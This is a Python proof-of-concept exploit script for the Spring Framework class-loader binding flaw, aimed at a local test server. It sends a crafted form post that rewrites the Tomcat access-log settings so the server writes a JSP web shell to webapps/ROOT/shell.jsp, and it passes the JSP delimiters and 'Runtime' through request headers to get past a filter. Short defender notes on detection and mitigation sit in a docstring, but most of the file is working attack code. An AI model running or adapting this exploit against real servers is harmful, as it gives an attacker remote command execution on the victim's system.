exploit.py
import requests
def run_exploit():
    """Send the single proof-of-concept POST to the local test application.

    The form body sets five nested properties under
    ``class.module.classLoader.resources.context.parent.pipeline.first``
    (pattern, suffix, directory, prefix, fileDateFormat). Taken together they
    ask the server to write log output to ``webapps/ROOT/shell.jsp``, with a
    log pattern that assembles JSP code from three request headers.

    Defender notes:
      * Detection: form parameters whose names begin with
        ``class.module.classLoader`` are not normal application input, and a
        new ``.jsp`` file under the web root is a strong indicator that a
        request like this one succeeded.
      * Mitigation: run a patched Spring Framework release and restrict
        bindable fields (for example ``WebDataBinder.setDisallowedFields``)
        so that ``class.*`` paths can never be bound from a request.

    Returns None. Any exception raised while sending is printed, not
    propagated, so the caller cannot tell whether the request was delivered.
    """
    # The log pattern below refers to these headers as %{prefix}i, %{c}i and
    # %{suffix}i (URL-encoded in the body), so the JSP delimiters and the
    # word "Runtime" never appear literally in the pattern parameter.
    request_headers = {
        "prefix": "<%",
        "suffix": "%>//",
        # Supplied through a header because, per the original author, some
        # check looks for "Runtime" in the log pattern itself.
        "c": "Runtime",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    valve_settings = (
        # pattern: the JSP body, percent-encoded for the form post.
        "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20"
        "java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20"
        "out.println(new%20String(in.readAllBytes()))%3B%25%7Bsuffix%7Di",
        # suffix, directory and prefix combine into webapps/ROOT/shell.jsp.
        "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp",
        "class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT",
        "class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell",
        # An empty date format keeps a timestamp out of the file name.
        "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=",
    )
    form_body = "&".join(valve_settings)

    try:
        # NOTE(review): verify=False has no effect on this plain-http URL.
        requests.post(
            "http://localhost:8080/example/exploit",
            headers=request_headers,
            data=form_body,
            timeout=15,
            allow_redirects=False,
            verify=False,
        )
    except Exception as err:
        print(err)
def main():
    """Run the proof of concept against the local instance and print progress.

    The closing messages are printed whenever ``run_exploit`` returns, and
    ``run_exploit`` handles its own request errors, so "completed" here means
    only that the call returned, not that the server was affected.
    """
    try:
        print("[+] Running exploit")
        run_exploit()
        for status_line in (
            "[+] Exploit completed",
            "[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id",
        ):
            print(status_line)
    except Exception as err:
        print(err)
# Script entry point: runs only when the file is executed directly.
if __name__ == "__main__":
    main()